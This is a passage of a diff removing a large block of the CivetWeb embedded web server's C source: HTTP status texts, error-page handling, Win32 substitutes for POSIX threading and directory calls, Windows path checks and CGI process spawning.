-		return "Insufficient Storage"; /* RFC2518 Section 10.6, RFC4918
-		                                * Section 11.5 */
-	case 508:
-		return "Loop Detected"; /* RFC5842 Section 7.1 */
-
-	case 510:
-		return "Not Extended"; /* RFC 2774, Section 7 */
-	case 511:
-		return "Network Authentication Required"; /* RFC 6585, Section 6 */
-
-	/* Other status codes, not shown in the IANA HTTP status code
-	 * assignment.
-	 * E.g., "de facto" standards due to common use, ... */
-	case 418:
-		return "I am a teapot"; /* RFC2324 Section 2.3.2 */
-	case 419:
-		return "Authentication Timeout"; /* common use */
-	case 420:
-		return "Enhance Your Calm"; /* common use */
-	case 440:
-		return "Login Timeout"; /* common use */
-	case 509:
-		return "Bandwidth Limit Exceeded"; /* common use */
-
-	default:
-		/* This error code is unknown. This should not happen. */
-		if (conn) {
-			mg_cry(conn, "Unknown HTTP response code: %u", response_code);
-		}
-
-		/* Return at least a category according to RFC 2616 Section 10. */
-		if (response_code >= 100 && response_code < 200) {
-			/* Unknown informational status code */
-			return "Information";
-		}
-		if (response_code >= 200 && response_code < 300) {
-			/* Unknown success code */
-			return "Success";
-		}
-		if (response_code >= 300 && response_code < 400) {
-			/* Unknown redirection code */
-			return "Redirection";
-		}
-		if (response_code >= 400 && response_code < 500) {
-			/* Unknown request error code */
-			return "Client Error";
-		}
-		if (response_code >= 500 && response_code < 600) {
-			/* Unknown server error code */
-			return "Server Error";
-		}
-
-		/* Response code not even within reasonable range */
-		return "";
-	}
-}
-
-
-void
-mg_send_http_error(struct mg_connection *conn, int status, const char *fmt, ...)
-{
-	char buf[MG_BUF_LEN];
-	va_list ap;
-	int len, i, page_handler_found, scope, truncated, has_body;
-	char date[64];
-	time_t curtime = time(NULL);
-	const char *error_handler = NULL;
-	struct mg_file error_page_file = STRUCT_FILE_INITIALIZER;
-	const char *error_page_file_ext, *tstr;
-
-	const char *status_text = mg_get_response_code_text(conn, status);
-
-	if (conn == NULL) {
-		return;
-	}
-
-	conn->status_code = status;
-	if (conn->in_error_handler || (conn->ctx->callbacks.http_error == NULL)
-	    || conn->ctx->callbacks.http_error(conn, status)) {
-
-		/* Check for recursion */
-		if (conn->in_error_handler) {
-			DEBUG_TRACE(
-			    "Recursion when handling error %u - fall back to default",
-			    status);
-		} else {
-			/* Send user defined error pages, if defined */
-			error_handler = conn->ctx->config[ERROR_PAGES];
-			error_page_file_ext = conn->ctx->config[INDEX_FILES];
-			page_handler_found = 0;
-
-			if (error_handler != NULL) {
-				for (scope = 1; (scope <= 3) && !page_handler_found; scope++) {
-					switch (scope) {
-					case 1: /* Handler for specific error, e.g. 404 error */
-						mg_snprintf(conn,
-						            &truncated,
-						            buf,
-						            sizeof(buf) - 32,
-						            "%serror%03u.",
-						            error_handler,
-						            status);
-						break;
-					case 2: /* Handler for error group, e.g., 5xx error
-					         * handler
-					         * for all server errors (500-599) */
-						mg_snprintf(conn,
-						            &truncated,
-						            buf,
-						            sizeof(buf) - 32,
-						            "%serror%01uxx.",
-						            error_handler,
-						            status / 100);
-						break;
-					default: /* Handler for all errors */
-						mg_snprintf(conn,
-						            &truncated,
-						            buf,
-						            sizeof(buf) - 32,
-						            "%serror.",
-						            error_handler);
-						break;
-					}
-
-					/* String truncation in buf may only occur if
-					 * error_handler is too long. This string is
-					 * from the config, not from a client. */
-					(void)truncated;
-
-					len = (int)strlen(buf);
-
-					tstr = strchr(error_page_file_ext, '.');
-
-					while (tstr) {
-						for (i = 1;
-						     (i < 32) && (tstr[i] != 0) && (tstr[i] != ',');
-						     i++)
-							buf[len + i - 1] = tstr[i];
-						buf[len + i - 1] = 0;
-
-						if (mg_stat(conn, buf, &error_page_file.stat)) {
-							DEBUG_TRACE("Check error page %s - found", buf);
-							page_handler_found = 1;
-							break;
-						}
-						DEBUG_TRACE("Check error page %s - not found", buf);
-
-						tstr = strchr(tstr + i, '.');
-					}
-				}
-			}
-
-			if (page_handler_found) {
-				conn->in_error_handler = 1;
-				handle_file_based_request(conn, buf, &error_page_file);
-				conn->in_error_handler = 0;
-				return;
-			}
-		}
-
-		/* No custom error page. Send default error page. */
-		gmt_time_string(date, sizeof(date), &curtime);
-
-		/* Errors 1xx, 204 and 304 MUST NOT send a body */
-		has_body = ((status > 199) && (status != 204) && (status != 304));
-
-		conn->must_close = 1;
-		mg_printf(conn, "HTTP/1.1 %d %s\r\n", status, status_text);
-		send_no_cache_header(conn);
-		send_additional_header(conn);
-		if (has_body) {
-			mg_printf(conn,
-			          "%s",
-			          "Content-Type: text/plain; charset=utf-8\r\n");
-		}
-		mg_printf(conn,
-		          "Date: %s\r\n"
-		          "Connection: close\r\n\r\n",
-		          date);
-
-		/* Errors 1xx, 204 and 304 MUST NOT send a body */
-		if (has_body) {
-			mg_printf(conn, "Error %d: %s\n", status, status_text);
-
-			if (fmt != NULL) {
-				va_start(ap, fmt);
-				mg_vsnprintf(conn, NULL, buf, sizeof(buf), fmt, ap);
-				va_end(ap);
-				mg_write(conn, buf, strlen(buf));
-				DEBUG_TRACE("Error %i - [%s]", status, buf);
-			}
-
-		} else {
-			/* No body allowed. Close the connection. */
-			DEBUG_TRACE("Error %i", status);
-		}
-	}
-}
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_init(pthread_mutex_t *mutex, void *unused)
-{
-	(void)unused;
-	*mutex = CreateMutex(NULL, FALSE, NULL);
-	return (*mutex == NULL) ? -1 : 0;
-}
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_destroy(pthread_mutex_t *mutex)
-{
-	return (CloseHandle(*mutex) == 0) ? -1 : 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_lock(pthread_mutex_t *mutex)
-{
-	return (WaitForSingleObject(*mutex, (DWORD)INFINITE) == WAIT_OBJECT_0) ? 0
-	                                                                       : -1;
-}
-
-
-#ifdef ENABLE_UNUSED_PTHREAD_FUNCTIONS
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_trylock(pthread_mutex_t *mutex)
-{
-	switch (WaitForSingleObject(*mutex, 0)) {
-	case WAIT_OBJECT_0:
-		return 0;
-	case WAIT_TIMEOUT:
-		return -2; /* EBUSY */
-	}
-	return -1;
-}
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_unlock(pthread_mutex_t *mutex)
-{
-	return (ReleaseMutex(*mutex) == 0) ? -1 : 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_init(pthread_cond_t *cv, const void *unused)
-{
-	(void)unused;
-	InitializeCriticalSection(&cv->threadIdSec);
-	cv->waiting_thread = NULL;
-	return 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_timedwait(pthread_cond_t *cv,
-                       pthread_mutex_t *mutex,
-                       const struct timespec *abstime)
-{
-	struct mg_workerTLS **ptls,
-	    *tls = (struct mg_workerTLS *)pthread_getspecific(sTlsKey);
-	int ok;
-	int64_t nsnow, nswaitabs, nswaitrel;
-	DWORD mswaitrel;
-
-	EnterCriticalSection(&cv->threadIdSec);
-	/* Add this thread to cv's waiting list */
-	ptls = &cv->waiting_thread;
-	for (; *ptls != NULL; ptls = &(*ptls)->next_waiting_thread)
-		;
-	tls->next_waiting_thread = NULL;
-	*ptls = tls;
-	LeaveCriticalSection(&cv->threadIdSec);
-
-	if (abstime) {
-		nsnow = mg_get_current_time_ns();
-		nswaitabs =
-		    (((int64_t)abstime->tv_sec) * 1000000000) + abstime->tv_nsec;
-		nswaitrel = nswaitabs - nsnow;
-		if (nswaitrel < 0) {
-			nswaitrel = 0;
-		}
-		mswaitrel = (DWORD)(nswaitrel / 1000000);
-	} else {
-		mswaitrel = (DWORD)INFINITE;
-	}
-
-	pthread_mutex_unlock(mutex);
-	ok = (WAIT_OBJECT_0
-	      == WaitForSingleObject(tls->pthread_cond_helper_mutex, mswaitrel));
-	if (!ok) {
-		ok = 1;
-		EnterCriticalSection(&cv->threadIdSec);
-		ptls = &cv->waiting_thread;
-		for (; *ptls != NULL; ptls = &(*ptls)->next_waiting_thread) {
-			if (*ptls == tls) {
-				*ptls = tls->next_waiting_thread;
-				ok = 0;
-				break;
-			}
-		}
-		LeaveCriticalSection(&cv->threadIdSec);
-		if (ok) {
-			WaitForSingleObject(tls->pthread_cond_helper_mutex,
-			                    (DWORD)INFINITE);
-		}
-	}
-	/* This thread has been removed from cv's waiting list */
-	pthread_mutex_lock(mutex);
-
-	return ok ? 0 : -1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_wait(pthread_cond_t *cv, pthread_mutex_t *mutex)
-{
-	return pthread_cond_timedwait(cv, mutex, NULL);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_signal(pthread_cond_t *cv)
-{
-	HANDLE wkup = NULL;
-	BOOL ok = FALSE;
-
-	EnterCriticalSection(&cv->threadIdSec);
-	if (cv->waiting_thread) {
-		wkup = cv->waiting_thread->pthread_cond_helper_mutex;
-		cv->waiting_thread = cv->waiting_thread->next_waiting_thread;
-
-		ok = SetEvent(wkup);
-		assert(ok);
-	}
-	LeaveCriticalSection(&cv->threadIdSec);
-
-	return ok ? 0 : 1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_broadcast(pthread_cond_t *cv)
-{
-	EnterCriticalSection(&cv->threadIdSec);
-	while (cv->waiting_thread) {
-		pthread_cond_signal(cv);
-	}
-	LeaveCriticalSection(&cv->threadIdSec);
-
-	return 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_destroy(pthread_cond_t *cv)
-{
-	EnterCriticalSection(&cv->threadIdSec);
-	assert(cv->waiting_thread == NULL);
-	LeaveCriticalSection(&cv->threadIdSec);
-	DeleteCriticalSection(&cv->threadIdSec);
-
-	return 0;
-}
-
-
-#ifdef ALTERNATIVE_QUEUE
-FUNCTION_MAY_BE_UNUSED
-static void *
-event_create(void)
-{
-	return (void *)CreateEvent(NULL, FALSE, FALSE, NULL);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-event_wait(void *eventhdl)
-{
-	int res = WaitForSingleObject((HANDLE)eventhdl, (DWORD)INFINITE);
-	return (res == WAIT_OBJECT_0);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-event_signal(void *eventhdl)
-{
-	return (int)SetEvent((HANDLE)eventhdl);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static void
-event_destroy(void *eventhdl)
-{
-	CloseHandle((HANDLE)eventhdl);
-}
-#endif
-
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-
-/* For Windows, change all slashes to backslashes in path names. */
-static void
-change_slashes_to_backslashes(char *path)
-{
-	int i;
-
-	for (i = 0; path[i] != '\0'; i++) {
-		if (path[i] == '/') {
-			path[i] = '\\';
-		}
-
-		/* remove double backslash (check i > 0 to preserve UNC paths,
-		 * like \\server\file.txt) */
-		if ((path[i] == '\\') && (i > 0)) {
-			while ((path[i + 1] == '\\') || (path[i + 1] == '/')) {
-				(void)memmove(path + i + 1, path + i + 2, strlen(path + i + 1));
-			}
-		}
-	}
-}
-
-
-static int
-mg_wcscasecmp(const wchar_t *s1, const wchar_t *s2)
-{
-	int diff;
-
-	do {
-		diff = tolower(*s1) - tolower(*s2);
-		s1++;
-		s2++;
-	} while ((diff == 0) && (s1[-1] != '\0'));
-
-	return diff;
-}
-
-
-/* Encode 'path' which is assumed UTF-8 string, into UNICODE string.
- * wbuf and wbuf_len is a target buffer and its length. */
-static void
-path_to_unicode(const struct mg_connection *conn,
-                const char *path,
-                wchar_t *wbuf,
-                size_t wbuf_len)
-{
-	char buf[PATH_MAX], buf2[PATH_MAX];
-	wchar_t wbuf2[MAX_PATH + 1];
-	DWORD long_len, err;
-	int (*fcompare)(const wchar_t *, const wchar_t *) = mg_wcscasecmp;
-
-	mg_strlcpy(buf, path, sizeof(buf));
-	change_slashes_to_backslashes(buf);
-
-	/* Convert to Unicode and back. If doubly-converted string does not
-	 * match the original, something is fishy, reject. */
-	memset(wbuf, 0, wbuf_len * sizeof(wchar_t));
-	MultiByteToWideChar(CP_UTF8, 0, buf, -1, wbuf, (int)wbuf_len);
-	WideCharToMultiByte(
-	    CP_UTF8, 0, wbuf, (int)wbuf_len, buf2, sizeof(buf2), NULL, NULL);
-	if (strcmp(buf, buf2) != 0) {
-		wbuf[0] = L'\0';
-	}
-
-	/* Windows file systems are not case sensitive, but you can still use
-	 * uppercase and lowercase letters (on all modern file systems).
-	 * The server can check if the URI uses the same upper/lowercase
-	 * letters an the file system, effectively making Windows servers
-	 * case sensitive (like Linux servers are). It is still not possible
-	 * to use two files with the same name in different cases on Windows
-	 * (like /a and /A) - this would be possible in Linux.
-	 * As a default, Windows is not case sensitive, but the case sensitive
-	 * file name check can be activated by an additional configuration. */
-	if (conn) {
-		if (conn->ctx->config[CASE_SENSITIVE_FILES]
-		    && !mg_strcasecmp(conn->ctx->config[CASE_SENSITIVE_FILES], "yes")) {
-			/* Use case sensitive compare function */
-			fcompare = wcscmp;
-		}
-	}
-	(void)conn; /* conn is currently unused */
-
-#if !defined(_WIN32_WCE)
-	/* Only accept a full file path, not a Windows short (8.3) path. */
-	memset(wbuf2, 0, ARRAY_SIZE(wbuf2) * sizeof(wchar_t));
-	long_len = GetLongPathNameW(wbuf, wbuf2, ARRAY_SIZE(wbuf2) - 1);
-	if (long_len == 0) {
-		err = GetLastError();
-		if (err == ERROR_FILE_NOT_FOUND) {
-			/* File does not exist. This is not always a problem here. */
-			return;
-		}
-	}
-	if ((long_len >= ARRAY_SIZE(wbuf2)) || (fcompare(wbuf, wbuf2) != 0)) {
-		/* Short name is used. */
-		wbuf[0] = L'\0';
-	}
-#else
-	(void)long_len;
-	(void)wbuf2;
-	(void)err;
-
-	if (strchr(path, '~')) {
-		wbuf[0] = L'\0';
-	}
-#endif
-}
-
-
-/* Windows happily opens files with some garbage at the end of file name.
- * For example, fopen("a.cgi    ", "r") on Windows successfully opens
- * "a.cgi", despite one would expect an error back.
- * This function returns non-0 if path ends with some garbage. */
-static int
-path_cannot_disclose_cgi(const char *path)
-{
-	static const char *allowed_last_characters = "_-";
-	int last = path[strlen(path) - 1];
-	return isalnum(last) || strchr(allowed_last_characters, last) != NULL;
-}
-
-
-static int
-mg_stat(const struct mg_connection *conn,
-        const char *path,
-        struct mg_file_stat *filep)
-{
-	wchar_t wbuf[PATH_MAX];
-	WIN32_FILE_ATTRIBUTE_DATA info;
-	time_t creation_time;
-
-	if (!filep) {
-		return 0;
-	}
-	memset(filep, 0, sizeof(*filep));
-
-	if (conn && is_file_in_memory(conn, path)) {
-		/* filep->is_directory = 0; filep->gzipped = 0; .. already done by
-		 * memset */
-
-		/* Quick fix (for 1.9.x): */
-		/* mg_stat must fill all fields, also for files in memory */
-		struct mg_file tmp_file = STRUCT_FILE_INITIALIZER;
-		open_file_in_memory(conn, path, &tmp_file, MG_FOPEN_MODE_NONE);
-		filep->size = tmp_file.stat.size;
-		filep->location = 2;
-		/* TODO: for 1.10: restructure how files in memory are handled */
-
-		/* The "file in memory" feature is a candidate for deletion.
-		 * Please join the discussion at
-		 * https://groups.google.com/forum/#!topic/civetweb/h9HT4CmeYqI
-		 */
-
-		filep->last_modified = time(NULL); /* TODO */
-		/* last_modified = now ... assumes the file may change during
-		 * runtime,
-		 * so every mg_fopen call may return different data */
-		/* last_modified = conn->ctx.start_time;
-		 * May be used it the data does not change during runtime. This
-		 * allows
-		 * browser caching. Since we do not know, we have to assume the file
-		 * in memory may change. */
-		return 1;
-	}
-
-	path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-	if (GetFileAttributesExW(wbuf, GetFileExInfoStandard, &info) != 0) {
-		filep->size = MAKEUQUAD(info.nFileSizeLow, info.nFileSizeHigh);
-		filep->last_modified =
-		    SYS2UNIX_TIME(info.ftLastWriteTime.dwLowDateTime,
-		                  info.ftLastWriteTime.dwHighDateTime);
-
-		/* On Windows, the file creation time can be higher than the
-		 * modification time, e.g. when a file is copied.
-		 * Since the Last-Modified timestamp is used for caching
-		 * it should be based on the most recent timestamp. */
-		creation_time = SYS2UNIX_TIME(info.ftCreationTime.dwLowDateTime,
-		                              info.ftCreationTime.dwHighDateTime);
-		if (creation_time > filep->last_modified) {
-			filep->last_modified = creation_time;
-		}
-
-		filep->is_directory = info.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY;
-		/* If file name is fishy, reset the file structure and return
-		 * error.
-		 * Note it is important to reset, not just return the error, cause
-		 * functions like is_file_opened() check the struct. */
-		if (!filep->is_directory && !path_cannot_disclose_cgi(path)) {
-			memset(filep, 0, sizeof(*filep));
-			return 0;
-		}
-
-		return 1;
-	}
-
-	return 0;
-}
-
-
-static int
-mg_remove(const struct mg_connection *conn, const char *path)
-{
-	wchar_t wbuf[PATH_MAX];
-	path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-	return DeleteFileW(wbuf) ? 0 : -1;
-}
-
-
-static int
-mg_mkdir(const struct mg_connection *conn, const char *path, int mode)
-{
-	wchar_t wbuf[PATH_MAX];
-	(void)mode;
-	path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-	return CreateDirectoryW(wbuf, NULL) ? 0 : -1;
-}
-
-
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-/* Implementation of POSIX opendir/closedir/readdir for Windows. */
-FUNCTION_MAY_BE_UNUSED
-static DIR *
-mg_opendir(const struct mg_connection *conn, const char *name)
-{
-	DIR *dir = NULL;
-	wchar_t wpath[PATH_MAX];
-	DWORD attrs;
-
-	if (name == NULL) {
-		SetLastError(ERROR_BAD_ARGUMENTS);
-	} else if ((dir = (DIR *)mg_malloc(sizeof(*dir))) == NULL) {
-		SetLastError(ERROR_NOT_ENOUGH_MEMORY);
-	} else {
-		path_to_unicode(conn, name, wpath, ARRAY_SIZE(wpath));
-		attrs = GetFileAttributesW(wpath);
-		if (attrs != 0xFFFFFFFF && ((attrs & FILE_ATTRIBUTE_DIRECTORY)
-		                            == FILE_ATTRIBUTE_DIRECTORY)) {
-			(void)wcscat(wpath, L"\\*");
-			dir->handle = FindFirstFileW(wpath, &dir->info);
-			dir->result.d_name[0] = '\0';
-		} else {
-			mg_free(dir);
-			dir = NULL;
-		}
-	}
-
-	return dir;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-mg_closedir(DIR *dir)
-{
-	int result = 0;
-
-	if (dir != NULL) {
-		if (dir->handle != INVALID_HANDLE_VALUE)
-			result = FindClose(dir->handle) ? 0 : -1;
-
-		mg_free(dir);
-	} else {
-		result = -1;
-		SetLastError(ERROR_BAD_ARGUMENTS);
-	}
-
-	return result;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct dirent *
-mg_readdir(DIR *dir)
-{
-	struct dirent *result = 0;
-
-	if (dir) {
-		if (dir->handle != INVALID_HANDLE_VALUE) {
-			result = &dir->result;
-			(void)WideCharToMultiByte(CP_UTF8,
-			                          0,
-			                          dir->info.cFileName,
-			                          -1,
-			                          result->d_name,
-			                          sizeof(result->d_name),
-			                          NULL,
-			                          NULL);
-
-			if (!FindNextFileW(dir->handle, &dir->info)) {
-				(void)FindClose(dir->handle);
-				dir->handle = INVALID_HANDLE_VALUE;
-			}
-
-		} else {
-			SetLastError(ERROR_FILE_NOT_FOUND);
-		}
-	} else {
-		SetLastError(ERROR_BAD_ARGUMENTS);
-	}
-
-	return result;
-}
-
-
-#ifndef HAVE_POLL
-FUNCTION_MAY_BE_UNUSED
-static int
-poll(struct pollfd *pfd, unsigned int n, int milliseconds)
-{
-	struct timeval tv;
-	fd_set set;
-	unsigned int i;
-	int result;
-	SOCKET maxfd = 0;
-
-	memset(&tv, 0, sizeof(tv));
-	tv.tv_sec = milliseconds / 1000;
-	tv.tv_usec = (milliseconds % 1000) * 1000;
-	FD_ZERO(&set);
-
-	for (i = 0; i < n; i++) {
-		FD_SET((SOCKET)pfd[i].fd, &set);
-		pfd[i].revents = 0;
-
-		if (pfd[i].fd > maxfd) {
-			maxfd = pfd[i].fd;
-		}
-	}
-
-	if ((result = select((int)maxfd + 1, &set, NULL, NULL, &tv)) > 0) {
-		for (i = 0; i < n; i++) {
-			if (FD_ISSET(pfd[i].fd, &set)) {
-				pfd[i].revents = POLLIN;
-			}
-		}
-	}
-
-	/* We should subtract the time used in select from remaining
-	 * "milliseconds", in particular if called from mg_poll with a
-	 * timeout quantum.
-	 * Unfortunately, the remaining time is not stored in "tv" in all
-	 * implementations, so the result in "tv" must be considered undefined.
-	 * See http://man7.org/linux/man-pages/man2/select.2.html */
-
-	return result;
-}
-#endif /* HAVE_POLL */
-
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-
-static void
-set_close_on_exec(SOCKET sock, struct mg_connection *conn /* may be null */)
-{
-	(void)conn; /* Unused. */
-#if defined(_WIN32_WCE)
-	(void)sock;
-#else
-	(void)SetHandleInformation((HANDLE)(intptr_t)sock, HANDLE_FLAG_INHERIT, 0);
-#endif
-}
-
-
-int
-mg_start_thread(mg_thread_func_t f, void *p)
-{
-#if defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1)
-	/* Compile-time option to control stack size, e.g.
-	 * -DUSE_STACK_SIZE=16384
-	 */
-	return ((_beginthread((void(__cdecl *)(void *))f, USE_STACK_SIZE, p)
-	         == ((uintptr_t)(-1L)))
-	            ? -1
-	            : 0);
-#else
-	return (
-	    (_beginthread((void(__cdecl *)(void *))f, 0, p) == ((uintptr_t)(-1L)))
-	        ? -1
-	        : 0);
-#endif /* defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1) */
-}
-
-
-/* Start a thread storing the thread context. */
-static int
-mg_start_thread_with_id(unsigned(__stdcall *f)(void *),
-                        void *p,
-                        pthread_t *threadidptr)
-{
-	uintptr_t uip;
-	HANDLE threadhandle;
-	int result = -1;
-
-	uip = _beginthreadex(NULL, 0, (unsigned(__stdcall *)(void *))f, p, 0, NULL);
-	threadhandle = (HANDLE)uip;
-	if ((uip != (uintptr_t)(-1L)) && (threadidptr != NULL)) {
-		*threadidptr = threadhandle;
-		result = 0;
-	}
-
-	return result;
-}
-
-
-/* Wait for a thread to finish. */
-static int
-mg_join_thread(pthread_t threadid)
-{
-	int result;
-	DWORD dwevent;
-
-	result = -1;
-	dwevent = WaitForSingleObject(threadid, (DWORD)INFINITE);
-	if (dwevent == WAIT_FAILED) {
-		DEBUG_TRACE("WaitForSingleObject() failed, error %d", ERRNO);
-	} else {
-		if (dwevent == WAIT_OBJECT_0) {
-			CloseHandle(threadid);
-			result = 0;
-		}
-	}
-
-	return result;
-}
-
-#if !defined(NO_SSL_DL) && !defined(NO_SSL)
-/* If SSL is loaded dynamically, dlopen/dlclose is required. */
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static HANDLE
-dlopen(const char *dll_name, int flags)
-{
-	wchar_t wbuf[PATH_MAX];
-	(void)flags;
-	path_to_unicode(NULL, dll_name, wbuf, ARRAY_SIZE(wbuf));
-	return LoadLibraryW(wbuf);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-dlclose(void *handle)
-{
-	int result;
-
-	if (FreeLibrary((HMODULE)handle) != 0) {
-		result = 0;
-	} else {
-		result = -1;
-	}
-
-	return result;
-}
-
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-#endif
-
-
-#if !defined(NO_CGI)
-#define SIGKILL (0)
-
-static int
-kill(pid_t pid, int sig_num)
-{
-	(void)TerminateProcess((HANDLE)pid, (UINT)sig_num);
-	(void)CloseHandle((HANDLE)pid);
-	return 0;
-}
-
-
-static void
-trim_trailing_whitespaces(char *s)
-{
-	char *e = s + strlen(s) - 1;
-	while ((e > s) && isspace(*(unsigned char *)e)) {
-		*e-- = '\0';
-	}
-}
-
-
-static pid_t
-spawn_process(struct mg_connection *conn,
-              const char *prog,
-              char *envblk,
-              char *envp[],
-              int fdin[2],
-              int fdout[2],
-              int fderr[2],
-              const char *dir)
-{
-	HANDLE me;
-	char *p, *interp, full_interp[PATH_MAX], full_dir[PATH_MAX],
-	    cmdline[PATH_MAX], buf[PATH_MAX];
-	int truncated;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	STARTUPINFOA si;
-	PROCESS_INFORMATION pi = {0};
-
-	(void)envp;
-
-	memset(&si, 0, sizeof(si));
-	si.cb = sizeof(si);
-
-	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
-	si.wShowWindow = SW_HIDE;
-
-	me = GetCurrentProcess();
-	DuplicateHandle(me,
-	                (HANDLE)_get_osfhandle(fdin[0]),
-	                me,
-	                &si.hStdInput,
-	                0,
-	                TRUE,
-	                DUPLICATE_SAME_ACCESS);
-	DuplicateHandle(me,
-	                (HANDLE)_get_osfhandle(fdout[1]),
-	                me,
-	                &si.hStdOutput,
-	                0,
-	                TRUE,
-	                DUPLICATE_SAME_ACCESS);
-	DuplicateHandle(me,
-	                (HANDLE)_get_osfhandle(fderr[1]),
-	                me,
-	                &si.hStdError,
-	                0,
-	                TRUE,
-	                DUPLICATE_SAME_ACCESS);
-
-	/* Mark handles that should not be inherited. See
-	 * https://msdn.microsoft.com/en-us/library/windows/desktop/ms682499%28v=vs.85%29.aspx
-	 */
-	SetHandleInformation((HANDLE)_get_osfhandle(fdin[1]),
-	                     HANDLE_FLAG_INHERIT,
-	                     0);
-	SetHandleInformation((HANDLE)_get_osfhandle(fdout[0]),
-	                     HANDLE_FLAG_INHERIT,
-	                     0);
-	SetHandleInformation((HANDLE)_get_osfhandle(fderr[0]),
-	                     HANDLE_FLAG_INHERIT,
-	                     0);
-
-	/* If CGI file is a script, try to read the interpreter line */
-	interp = conn->ctx->config[CGI_INTERPRETER];
-	if (interp == NULL) {
-		buf[0] = buf[1] = '\0';
-
-		/* Read the first line of the script into the buffer */
-		mg_snprintf(
-		    conn, &truncated, cmdline, sizeof(cmdline), "%s/%s", dir, prog);
-
-		if (truncated) {
-			pi.hProcess = (pid_t)-1;
-			goto spawn_cleanup;
-		}
-
-		if (mg_fopen(conn, cmdline, MG_FOPEN_MODE_READ, &file)) {
-			p = (char *)file.access.membuf;
-			mg_fgets(buf, sizeof(buf), &file, &p);
-			(void)mg_fclose(&file.access); /* ignore error on read only file */
-			buf[sizeof(buf) - 1] = '\0';
-		}
-
-		if ((buf[0] == '#') && (buf[1] == '!')) {
-			trim_trailing_whitespaces(buf + 2);
-		} else {
-			buf[2] = '\0';
-		}
-		interp = buf + 2;
-	}
-
-	if (interp[0] != '\0') {
-		GetFullPathNameA(interp, sizeof(full_interp), full_interp, NULL);
-		interp = full_interp;
-	}
-	GetFullPathNameA(dir, sizeof(full_dir), full_dir, NULL);
-
-	if (interp[0] != '\0') {
-		mg_snprintf(conn,
-		            &truncated,
-		            cmdline,
-		            sizeof(cmdline),
-		            "\"%s\" \"%s\\%s\"",
-		            interp,
-		            full_dir,
-		            prog);
-	} else {
-		mg_snprintf(conn,
-		            &truncated,
-		            cmdline,
-		            sizeof(cmdline),
-		            "\"%s\\%s\"",
-		            full_dir,
-		            prog);
-	}
-
-	if (truncated) {
-		pi.hProcess = (pid_t)-1;
-		goto spawn_cleanup;
-	}
-
-	DEBUG_TRACE("Running [%s]", cmdline);
-	if (CreateProcessA(NULL,
-	                   cmdline,
-	                   NULL,
-	                   NULL,
-	                   TRUE,
-	                   CREATE_NEW_PROCESS_GROUP,
-	                   envblk,
-	                   NULL,
-	                   &si,
-	                   &pi) == 0) {
-		mg_cry(
-		    conn, "%s: CreateProcess(%s): %ld", __func__, cmdline, (long)ERRNO);
-		pi.hProcess = (pid_t)-1;
-		/* goto spawn_cleanup; */
-	}
-
-spawn_cleanup:
-	(void)CloseHandle(si.hStdOutput);
-	(void)CloseHandle(si.hStdError);
-	(void)CloseHandle(si.hStdInput);
-	if (pi.hThread != NULL) {
-		(void)CloseHandle(pi.hThread);
-	}
-
-	return (pid_t)pi.hProcess;
-}
-#endif /* !NO_CGI */
-
-
-static int
-set_blocking_mode(SOCKET sock)
-{
-	unsigned long non_blocking = 0;
-	return ioctlsocket(sock, (long)FIONBIO, &non_blocking);
-}
-
-static int
-set_non_blocking_mode(SOCKET sock)
-{
-	unsigned long non_blocking = 1;
-	return ioctlsocket(sock, (long)FIONBIO, &non_blocking);
-}
-#else
-
-static int
-mg_stat(const struct mg_connection *conn,
-        const char *path,
-        struct mg_file_stat *filep)
-{
-	struct stat st;
-	if (!filep) {
-		return 0;
-	}
-	memset(filep, 0, sizeof(*filep));
-
-	if (conn && is_file_in_memory(conn, path)) {
-
-		/* Quick fix (for 1.9.x): */
-		/* mg_stat must fill all fields, also for files in memory */
-		struct mg_file tmp_file = STRUCT_FILE_INITIALIZER;
-		open_file_in_memory(conn, path, &tmp_file, MG_FOPEN_MODE_NONE);
-		filep->size = tmp_file.stat.size;
-		filep->last_modified = time(NULL);
-		filep->location = 2;
